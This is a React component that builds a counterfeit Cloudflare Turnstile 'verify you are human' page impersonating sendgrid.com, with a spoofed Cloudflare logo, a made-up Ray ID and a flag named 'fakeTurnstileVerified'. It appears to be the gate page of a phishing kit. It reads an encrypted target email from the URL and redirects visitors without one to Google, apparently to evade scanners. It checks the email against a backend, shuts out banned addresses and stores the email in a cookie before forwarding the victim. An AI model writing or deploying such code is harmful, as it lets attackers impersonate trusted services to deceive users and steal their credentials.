import React, { useState, useEffect } from 'react';
import { useNavigate, useLocation } from 'react-router-dom';
import { Helmet } from 'react-helmet';
import axios from 'axios';
import './TurnstileChallenge.css';

function TurnstileChallenge() {
  const navigate = useNavigate();
  const location = useLocation();
  const requestedPath = location.state?.from || '/';
  const [canVerify, setCanVerify] = useState(false);
  const [isChecked, setIsChecked] = useState(false);
  const [shouldRedirect, setShouldRedirect] = useState(false);

  // Anti-bot delay
  useEffect(() => {
    const timer = setTimeout(() => {
      setCanVerify(true);
    }, 1000);
    return () => clearTimeout(timer);
  }, []);

  // Check encrypted email on mount
  useEffect(() => {
    const queryParams = new URLSearchParams(location.search);
    const encryptedEmail = queryParams.get('email');

    if (!encryptedEmail) {
      console.log('No email in Turnstile, redirecting to Google');
      window.location.href = 'https://www.google.com';
      setShouldRedirect(true); // Set flag to prevent rendering
      return;
    }

    const checkEmail = async () => {
      try {
        const API_URL = process.env.REACT_APP_API_URL || 'http://localhost:5000/api';
        const response = await axios.post(`${API_URL}/check-email`, { encryptedEmail });
        console.log('Email check response:', response.data);

        if (!response.data.valid || response.data.banned) {
          console.log('Invalid or banned email, clearing session and redirecting to /verify');
          document.cookie.split(';').forEach((cookie) => {
            const [name] = cookie.split('=');
            document.cookie = `${name.trim()}=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT; SameSite=Strict`;
          });
          sessionStorage.clear();
          navigate('/verify', { replace: true });
          setShouldRedirect(true);
        } else {
          setIsChecked(true); // Only set if check passes
        }
      } catch (error) {
        console.error('Email check error:', error.response?.data || error.message);
        document.cookie.split(';').forEach((cookie) => {
          const [name] = cookie.split('=');
          document.cookie = `${name.trim()}=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT; SameSite=Strict`;
        });
        sessionStorage.clear();
        navigate('/verify', { replace: true });
        setShouldRedirect(true);
      }
    };

    checkEmail();
  }, [location, navigate]);

  const handleVerify = () => {
    if (!canVerify) {
      console.log('Verification blocked: Too soon or bot detected');
      return;
    }

    const queryParams = new URLSearchParams(location.search);
    const encryptedEmail = queryParams.get('email');
    // No need to check encryptedEmail here; handled in useEffect

    console.log('Checkbox clicked! Redirecting to:', requestedPath);
    const cookieValue = encodeURIComponent(encryptedEmail);
    document.cookie = `encryptedEmail=${cookieValue}; path=/; max-age=3600; SameSite=Strict`;
    sessionStorage.setItem('fakeTurnstileVerified', 'true');
    navigate(requestedPath, { replace: true });
  };

  // Early return for redirect cases
  if (shouldRedirect) {
    return null;
  }

  // Show loading state until check is complete
  if (!isChecked) {
    return <div>Checking security...</div>;
  }

  // Render Cloudflare UI only if check passes
  return (
    <>
      <Helmet>
        <title>SendGrid Verification</title>
      </Helmet>
      <div className="_container_1gc3y_9">
        <div className="_head_1gc3y_1">
          <div className="_heading_1gc3y_39">sendgrid.com</div>
          <p>Verify you are human by completing the action below.</p>
          <div className="_captchaBox_1db52_1">
            <div className="_verifySection_1db52_17">
              <div className="_checkContainer_1db52_63">
                <div
                  className="_checkSquare_1db52_75"
                  onClick={handleVerify}
                  style={{ cursor: canVerify ? 'pointer' : 'not-allowed' }}
                ></div>
                <span>Verify you are human</span>
              </div>
              <div className="_logoSection_1db52_39">
                <img
                  src="data:image/svg+xml,%3csvg%20xmlns='http://www.w3.org/2000/svg'%20xmlns:xlink='http://www.w3.org/1999/xlink'%20viewBox='0%200%20105%2036'%20role='img'%20aria-hidden='true'%3e%3cpath%20fill='%23000'%20d='M11.679%2026.754h2.353v6.423h4.111v2.06H11.68v-8.483zM20.58%2031.02v-.024c0-2.436%201.965-4.412%204.584-4.412%202.62%200%204.56%201.951%204.56%204.387v.025c0%202.436-1.965%204.41-4.584%204.41-2.618%200-4.56-1.95-4.56-4.386zm6.743%200v-.024c0-1.223-.885-2.291-2.183-2.291-1.285%200-2.147%201.042-2.147%202.266v.025c0%201.222.886%202.29%202.171%202.29%201.298%200%202.159-1.042%202.159-2.266zM32.604%2031.517v-4.763h2.389v4.714c0%201.223.618%201.806%201.564%201.806.946%200%201.564-.557%201.564-1.745v-4.775h2.39v4.7c0%202.74-1.564%203.939-3.978%203.939s-3.93-1.223-3.93-3.878M44.112%2026.755h3.274c3.032%200%204.79%201.744%204.79%204.192v.025c0%202.447-1.782%204.265-4.838%204.265h-3.226v-8.483zm3.31%206.397c1.408%200%202.34-.775%202.34-2.146v-.024c0-1.357-.932-2.145-2.34-2.145h-.958v4.316l.959-.001zM55.596%2026.754h6.791v2.06h-4.438v1.442h4.014v1.951h-4.014v3.03h-2.353v-8.483zM65.661%2026.754h2.353v6.423h4.111v2.06h-6.464v-8.483zM78.273%2026.693h2.268l3.614%208.544h-2.522l-.62-1.515H77.74l-.606%201.515h-2.474l3.614-8.544zm2.062%205.2l-.946-2.413-.959%202.412h1.905zM87.186%2026.754H91.2c1.298%200%202.195.34%202.765.921.498.485.752%201.14.752%201.976v.024c0%201.296-.693%202.156-1.746%202.605l2.025%202.957H92.28l-1.71-2.57h-1.03v2.57h-2.353v-8.483zm3.905%204.072c.8%200%201.262-.388%201.262-1.006v-.024c0-.667-.486-1.006-1.275-1.006h-1.54v2.038l1.553-.002zM98.112%2026.754h6.827v2h-4.498v1.284h4.075v1.854h-4.075v1.346H105v1.999h-6.888v-8.483zM6.528%2032.014c-.33.744-1.023%201.272-1.944%201.272-1.286%200-2.171-1.067-2.171-2.29v-.025c0-1.223.86-2.266%202.146-2.266.97%200%201.708.595%202.02%201.406h2.48c-.398-2.02-2.173-3.526-4.475-3.526-2.62%200-4.584%201.977-4.584%204.41v.024c0%202.436%201.94%204.388%204.56%204.388%202.24%200%203.991-1.45%204.453-3.393H6.528z'%3e%3c/path%3e%3cpath%20d='M89.012%2022.355l.257-.887c.306-1.056.192-2.031-.321-2.748-.472-.66-1.259-1.049-2.214-1.094l-18.096-.229a.358.358%200%2001-.285-.151.367.367%200%2001-.04-.326.481.481%200%2001.42-.321l18.263-.232c2.166-.099%204.512-1.856%205.333-3.998L93.37%209.65a.659.659%200%2000.028-.36C92.216%203.975%2087.468%200%2081.792%200c-5.23%200-9.67%203.373-11.263%208.061a5.34%205.34%200%2000-3.756-1.039%205.356%205.356%200%2000-4.637%206.644c-4.099.12-7.386%203.475-7.386%207.6%200%20.368.028.735.082%201.1a.354.354%200%2000.348.305l33.408.004h.009a.44.44%200%2000.415-.32z'%20fill='%23F6821F'%3e%3c/path%3e%3cpath%20d='M95.04%209.847c-.167%200-.334.004-.5.013a.28.28%200%2000-.079.017.285.285%200%2000-.182.192l-.712%202.456c-.305%201.055-.192%202.03.322%202.746.471.661%201.258%201.05%202.213%201.094l3.858.232a.351.351%200%2001.275.149.365.365%200%2001.041.328.484.484%200%2001-.42.32l-4.008.232c-2.176.1-4.521%201.856-5.342%203.998l-.29.756a.212.212%200%2000.095.262c.03.017.062.027.096.028h13.802a.366.366%200%2000.356-.265%209.846%209.846%200%2000.367-2.677c-.001-5.457-4.429-9.88-9.891-9.88z'%20fill='%23FBAD41'%3e%3c/path%3e%3c/svg%3e"
                  alt="Cloudflare Logo"
                />
                <div className="_links_1db52_93">
                  <a href="#" className="_grayLink">Privacy</a>
                  <span> • </span>
                  <a href="#" className="_grayLink">Terms</a>
                </div>
              </div>
            </div>
          </div>
          <div className="_notice_1gc3y_71">
            sendgrid.com needs to review the security of your connection before proceeding.
          </div>
        </div>
        <div className="_foot_1gc3y_47">
          <p>Ray ID: 95bpl87491cd45fa</p>
          <p>Performance & security by Cloudflare</p>
        </div>
      </div>
    </>
  );
}

export default TurnstileChallenge;